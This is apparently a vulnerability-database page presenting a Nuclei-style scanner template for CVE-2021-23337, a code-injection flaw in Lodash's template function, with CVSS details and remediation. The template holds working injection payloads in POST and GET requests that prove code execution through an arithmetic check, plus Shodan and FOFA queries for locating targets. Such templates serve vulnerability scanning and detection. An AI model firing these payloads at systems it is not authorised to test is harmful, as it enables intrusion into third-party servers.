Lodash Template - Server-Side Template Injection (RCE)
CVE-2021-23337
Verified

Description: Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
Severity: High
CVSS Score: 7.2
Exploit Probability: 4%
Affected Product: lodash
Published Date: April 7, 2026
Template Author: dhiyaneshdk
CVE-2021-23337.yaml

id: CVE-2021-23337

info:
  name: Lodash Template - Server-Side Template Injection (RCE)
  author: DhiyaneshDk
  severity: high
  description: |
    Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function.
  impact: |
    Attackers can execute arbitrary commands on the host system, leading to full system compromise.
  remediation: |
    Update to version 4.17.21 or later.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2021-23337
    - https://security.snyk.io/vuln/SNYK-JS-LODASH-1040724
    - https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c
    - https://github.com/advisories/GHSA-35jh-r3h4-6jhm
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.2
    cve-id: CVE-2021-23337
    cwe-id: CWE-94
    epss-score: 0.04314
    epss-percentile: 0.89018
  metadata:
    verified: true
    max-request: 2
    vendor: lodash
    product: lodash
    shodan-query: http.component:"lodash"
    fofa-query: body="lodash"
  tags: cve,cve2021,lodash,ssti,rce,nodejs,javascript

flow: http(1) || http(2)

variables:
  randA: "{{rand_int(1000, 9999)}}"
  randB: "{{rand_int(1000, 9999)}}"

http:
  - raw:
      - |
        POST /template HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"template":"<%= name %>","variable":") { return String({{randA}}*{{randB}}) }; with(obj","data":{"name":"test"}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{to_number(randA)*to_number(randB)}}"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        name: eval_result
        regex:
          - "[0-9]+"

  - raw:
      - |
        GET /render?tpl=hello&variable=)%7Breturn+String({{randA}}*{{randB}})%7D%3Bwith(obj HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{to_number(randA)*to_number(randB)}}"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        part: body
        name: eval_result
        regex:
          - "[0-9]+"
# digest: 490a0046304402204d655363f062269eb61dc80e416aa20290cf99d9e66ca1596838100fe8b445ad02200645eb2b5018fbd1e5af9fb7bd302b4cda15199760ce56b732e78e9589c4164b:922c64590222798bb761d5b6d8e72950

CVSS Metrics
Score: 7.2
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
CVE ID: CVE-2021-23337
CWE ID: CWE-94
Remediation Steps: Update to version 4.17.21 or later.